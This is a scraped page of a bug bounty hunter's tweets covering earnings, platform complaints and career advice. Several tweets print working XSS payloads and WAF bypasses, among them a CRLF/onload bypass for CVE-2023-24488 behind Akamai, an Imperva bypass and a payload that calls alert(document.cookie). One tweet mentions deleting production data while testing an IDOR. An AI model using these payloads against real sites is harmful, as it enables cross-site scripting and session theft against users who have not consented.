🇪🇨🍫
@bxmbn
Followers
17,208
Following
1
Media
154
Statuses
1,350
Explore trending content on Musk Viewer
コロンブス
• 179966 Tweets
イーロン
• 134931 Tweets
#RejectFinanceBill2024
• 86849 Tweets
SNBT
• 60757 Tweets
THE ASTRONAUT
• 36815 Tweets
公開停止
• 24468 Tweets
LINE Pay
• 23223 Tweets
Edin
• 22653 Tweets
内閣支持16.4
• 21794 Tweets
規正法改正案
• 19973 Tweets
最低更新
• 18357 Tweets
ひろみちお兄さん
• 15509 Tweets
郵便料金
• 15188 Tweets
Benedict
• 13860 Tweets
Francesca
• 11954 Tweets
時事世論調査
• 11890 Tweets
ZETA
• 11091 Tweets
怪獣8号
• 10627 Tweets
Sam Kerr
• 10325 Tweets
This year I Completed 500k in bounties
Most rewarded vulnerabilities and the ones I always focused since the beginning:
1. XSS (all types)
2. Cache Poisoning
3. BACs
Reached this amount totally from scratch, learning from the internet.
No certs.
0 Automation.
0 Collabs.
126
145
2K
Total Earnings by Year
2020 - $850.00
2021 - $19,750.00
2022 - $86,744.50
2023 So Far - $168,034.00
17 y/o me never thought about it, started with 0 Knowledge, curious trying to make money while being at home due to the pandemic, with patience it became my main source of income
87
117
1K
While testing for CVE-2023-24488 I found various servers behind Akamai and since the original payload gives a Forbidden response I found this bypass:
post_logout_redirect_uri=%0D%0A%0D%0A%3Cbody+x=%27&%27onload=%22(alert)(%27citrix+akamai+bypass%27)%22%3E
27
281
1K
If you are a beginner in bug bounty I recommend don’t ever buy any courses, nor look for mentors
Nothing will guarantee you success in bug bounty
I learned and keep learning myself by googling, reading hacktivity reports etc never spent a single dollar to learn
Just an advice
42
108
821
Been hunting for almost 3 years now, only focusing in XSS, learned other vuls by just reading
never bought courses, don’t use automation tools, not even burp pro and still manage to make a solid monthly income
Its not hard, if you see it hard, then it will be hard.
48
74
696
I was rewarded $9.600 bounties 2day and achieved what seemed to be impossible for a long time
Top 100 All-Time ✅
51
30
642
March's total Bounties: $32,119
5 Broken Access Control: $17,237
4 Reflected XSS = $9,671
2 Cache Deception = $2,789
1 Cache Poisoning - Stored XSS = $1,250
Retests and Bonuses: $1,172
41
27
632
Today's XSS in a Multi-Reflection case:
xss%27);}}});alert(document.cookie);$(function+a(){a();});$(function+a(){if(a){}else+if(a){/*///
20
145
622
Found these parameters but were being URL encoded as normal parameters, since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore, Strong WAF? No problem either ✅
It’s just art at this point 🎨🖌️
41
105
627
Wanna know How I prevented a Mass Data Breach?
Go Read:
Wanna know How a Bank offer led to PII Leak?
Go Read:
More writeups coming soon 🖤
20
114
595
Everything after /? is being reflected
?xss is reflected as Uppercase
=xss as Lowercase
The app is using Imperva WAF, however that feature allowed me to bypass it using:
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
21
101
593
My main goal is to get a million bounties and prove to all of you that you can success in Bug Bounty only by:
knowing the basics.
Not using tools/automation.
Thinking like a real black hat.
33
39
570
Top bb hunters stay at top because they never share their methodology, and if they do, it is always for a few people, never publicly
This is probably one of the reasons why most of them have never even disclosed a single report.
59
38
570
Blocked:
<details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)
Bypass:
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
20
142
560
This program rewards bounties even on weekends
This program’s dedication is the reason why I’m having success
22
17
484
April's total Bounties: $11,689
5 Reflected XSS = $6,948
3 Broken Access Control: $1,400
1 Cache Deception = $3,000
Retests and Bonuses: $341
Worst bounty month since January of last year ($8,519)
42
9
484
Stored XSS using Google Reviews 2
If you wonder why I submitted the review like that
It was because if I put </script> Google would render as blank (try it)
So I submitted another review with another account
Containing the rest of the payload so it could work ><svg onload=..
14
68
491
Story Time:
@Agornello
Caesar (turtle_shell) was the one who taught me about Cache Poisoning without even asking for it, after that report my life pretty much changed, I took every advice and took advantage of it
This is how important Triagers can be in the life of a researcher
Today was my last day working at
@Hacker0x01
! It has been an incredible journey and I had the pleasure to work with an amazing team.
Much kudos to all the triagers out there, it's a hard job and they are real heroes.
Also <3 to (most of) the hackers.
turtle_shell / caesar
51
3
357
26
40
485
Write ups coming up in 2024:
- Accessing 30 Million User’s Orders
- How I was able to steal your Insurance Plan
- UI:None Cache Poisoning/Deception Cases
- Stealing Bank Mail Offers To PII Leak
- Akamai Biggest Problem
Comment which one you want to see first 🤔
68
31
474
Its been 3 years since I started bug bounty hunting
600+ resolved reports in ~100 Companies
Still so much to learn and so much to earn as well 🫶🏽
45
19
456
Thank you to all cdn providers for inventing caching
Special mention to devs who don’t sanitize headers and cookies either 🫡
26
39
429
magicId=00192729301
Set-Cookie: SessionId=<sessionId.00192729301>
magicId=00192729302
Set-Cookie: SessionId=<sessionId.00192729302>
2023 and we still have these types of bugs lol
By the way, this is P1 In my books 🤓👆🏽
19
51
426
Each parameter reflects as Event Attributes in each Input tag, but each parameter is limited to 10 characters
Being limited to 10 characters was a good thing because it also allowed me to bypass the WAF 🤓
VR11=onfocus='`&VR12=`;alert/*&VR13=*/(1)'a='&VR14='autofocus
13
72
414
Critical Bounty today to finally reach the 10,000 Rep Milestone
It’s crazy that few days ago I was at 8,384 Rep🔝
27
6
394
Request header is easy to find as it’s a response header that reflects in all pages, they also have a public program, affects main domain, and a lot of hackers who know this attack in the leaderboard, maybe this can confirm I have the best WAF bypass 😌
17
31
386
My tweets were able to get me an invite 🙏🏽
I might be able to continue at the top 🤞🏽
12
12
371
💰✅
Found these parameters but were being URL encoded as normal parameters, since I was trying to find an injection point for a Cache Poisoning XSS, I sent them as cookies and they were not being URL encoded anymore, Strong WAF? No problem either ✅
It’s just art at this point 🎨🖌️
41
105
627
23
28
353
There are some changes guys 😝
• I cannot do the Akamai one yet, but sometime in 2024 I should have the green light
• There was actually a mistake, It’s 3 Million not 30, Still a mass data breach due to the sensitive info exposed
Will publish 2 blogs in January 5th
Write ups coming up in 2024:
- Accessing 30 Million User’s Orders
- How I was able to steal your Insurance Plan
- UI:None Cache Poisoning/Deception Cases
- Stealing Bank Mail Offers To PII Leak
- Akamai Biggest Problem
Comment which one you want to see first 🤔
68
31
474
10
26
349
Goals for the new year?
None.
I had none last year and it was my most successful year in every aspect to date that my old self wouldn’t even believe it
If you set goals, you are limiting yourself, you could do more than anything you set today
Happy New Year!
13
15
318
Got some delayed bounties In September
T-Mobile BBP Robbed me like 15k fixing crits and not paying but all good 😝
14
15
313
Hackerone vs Bugcrowd
Programs with higher bounties
Winner: Bugcrowd
Exclusive programs (Top Companies)
Winner: H1
Support
Winner: Bugcrowd
Triagers (communication, knowledge and response times)
Winner: H1 (by a lot)
16
20
309
Today, I learned that if there is a bypass
I should not name the title of the report “Bypass of …” anymore
9
13
272
I have probably the best Akamai XSS bypass until date
It works everytime, I could share it but if i do, Akamai will fix it
Devs should sanitize their inputs so that they dont rely on WAF, plus I make more money 😼🤝🏼😼
27
7
251
Will disconnect for a while🫡
Finished sending my last reports, Hopefully they get all triaged so they can cover all my expenses for the following days 🛫🏝️
21
2
252
My reaction when my hardest xss bypass gets closed as an ‘internal’ duplicate
18
9
249
Found a vulnerable request that always loads when navigating through the app
The cache duration is great I just need to wait until it expires and poison it with XSS to achieve ZERO UI Stored XSS
And the best part of it:
Big company + I use their services
7
14
240
I got duplicated for a POST based XSS but my report is a normal RXSS that leads to Account Takeover with a totally different path and parameter
Triager made a mistake and invited me to participate and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
15
11
237
Finally man!!
last time I got multiple invitations was literally a year ago
Time to make more bounties before the year ends 🙏🏽
11
6
225
Gotta keep your eyes open ✅
I got duplicated for a POST based XSS but my report is a normal RXSS that leads to Account Takeover with a totally different path and parameter
Triager made a mistake and invited me to participate and I found that the reporter asked the team to REMOVE Cloudflare 🤣🤣
15
11
237
12
9
223
More and more BBPs programs leaving/closing at a crazy rate
New VDPs every month
Almost 300 Reports in less than a week for this new VDP
We are doomed.
35
16
225
I’m making more than the average and most professions
Getting into Bug bounty was the best decision I took even though I tried to quit at somepoint because I was not seeing results, Life its about decisions
Great things never come easy
Top 100 All time Soon
21
9
218
Cache Poisoning XSS that does not require a file extension to cache and affects multiple pages should be treated as Critical
It’s insane that still to this day and after reporting them multiple times, the severity is treated as it was a normal limited stored XSS
6
11
214
Some of the reasons why VDPs still exist today:
*VDP-only hackers this year so far*
25
8
215
In 14 days I will be disclosing two reports
Can't wait for you to see these, especially the XSS one, it was a pretty clever find!
8
9
211
3 Months ago, I bought stocks from a company using some of the bounties I earned with them and the company it’s up more than 40% now
13
3
208
don’t report bugs to vdps, especially those who are multi-millionare companies this way we can force them to open bbps 😝
9
14
204
Proud to have a 740 credit score and 100k available credit at 20 years old in just 2 years of credit 🔐
13
4
203
At least they rewarded the bounty before banning me
It was a good program after all
made 110k in this program alone
But they disappointed me with their decision
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted data production, how am I suppose to show Impact, this time I didn’t even know the IDOR was going to work
Why is it my fault, why add assets like this in-scope anyways? I just dont get it
17
6
170
11
6
201
Me when VDP points get removed from all platforms and seeing all VDP Hackers go down to 0 points:
20
7
203
For anyone wondering more than half of my earnings are just XSS vulnerabilities.
Q2 2022 is when I learned about Cache Poisoning
This is why you see the increase on bounties since I found multiple Stored XSS via Cache Poisoning and stuck with it afterwards.
3
3
191
Most of my generation will be graduating by 25 and they might have saved a bit of money
Me at 20 I’m on my way to retire at 25 📈 🤞🏽
10
12
184
I noticed that you get private invitations based on what you search on google
I was looking at for cars at 1am today and got a private Invite from a Car company at 4 am
I was able to confirm this since I saw the same behavior on the other platform I hunt already.
19
4
188
@mouka0x
Hashtag in this post:
#BugBounty
💰
Your Bounties: $0,0000 😔
AON VDP: Thank you so much, I don’t need to open a BBP anymore 😊🥰
13
1
187
People that hunt on vdps is what keep them alive
We can all force them to open BBP’s only if nobody hunts on VDPs
16
18
186
Feels good when you receive an program invite and you use their services already
So far:
1 critical
1 High
7 Mediums
This always lets you have a huge advantage, especially on a program with limited scope, since others hackers need to go to the process of creating an account
7
5
181
Found an XSS endpoint where the server creates files without sanitation you can create a file then share it to anyone, you can also edit user’s files to save XSS on it using the uniqueId which is vulnerable to IDOR
Whats Your CVSS Score?
18
8
177
This program is just unbelievable, they have Mass PII leak as Critical, I reported mass PII Leak and they only rewarded as High. They didn’t follow their own policy, nor explained why.
But then I found an RXSS and they did followed their policy this time and rewarded as Low 🙂
8
9
172
Hackerone should pay me for indirectly promoting them 😂
Like everytime I tweet about my bounties new people ask me how to start
I will be happy only with more private invites tho
@Hacker0x01
👀
13
6
167
Why do programs add sensitive assets IN-SCOPE if they are going to ban me because I deleted data production, how am I suppose to show Impact, this time I didn’t even know the IDOR was going to work
Why is it my fault, why add assets like this in-scope anyways? I just dont get it
17
6
170
Biggest tip I can give you
Dont get mad or sad of others success
If you get mad as a result of others people’s success you are not going no where, you are lost..
Instead take as a challenge. you will overcome yourself and will help you in anything in life
7
13
165
I’m by myself in a program with 446 rep points and a total of 32,900 in bounties paid
Top bounty:5k
While I’m also in another program where there is only 1 hacker that has earned 20,000 in bounties but WITH 444 rep points
Top Bounty: 3k
Rep system is broken in H1 😭
7
5
168
1 year as a H1 Clear Member
I have seen few to zero benefits from what they state you will get as a H1 Clear member....
7
2
163
I never attacked anyone, If you can make these amounts of points in vdps you have the ability to do the same in a bbp thats all
They said it’s not of my business, but if more companies see they can still get good-impactful-quality reports without having to reward, we’re fucked.
Some of the reasons why VDPs still exist today:
*VDP-only hackers this year so far*
25
8
215
14
8
162
I just read about the cache deception in chatgpt
You have no idea how common cache deception is
Devs should know that if your app is behind Cloudflare you SHOULD have Cache Deception Armor Enabled
I helped Cloudflare finding a bypass for it
7
20
159
I stopped in OCT because I thought it was not that important anymore and my biggest issue was that I didn’t want platforms to benefit from it. I could’ve hide their names but I just decided to stop
but here they are again:
NOV bounties were: $39,312
Bounties from DEC to FEB:
@bxmbn
@scarybeasts
hello
@bxmbn
why you don't post your monthly bounties screenshot...which you were posting few months before
0
0
2
16
6
160
After two years H1 revoked my Clear Status due to an unfair “unsafe testing” penalty, I feel like this penalty is too much giving that it was my first ever warning since I got it, and part of the issue was the program’s fault for not providing test creds 💔
11
0
153
Triagers I trust👆🏽🤓:
Carlos
Alexander
Vanessa
Layla
Lucas
Enzo
Ivan
Wilson
Tal
17
1
146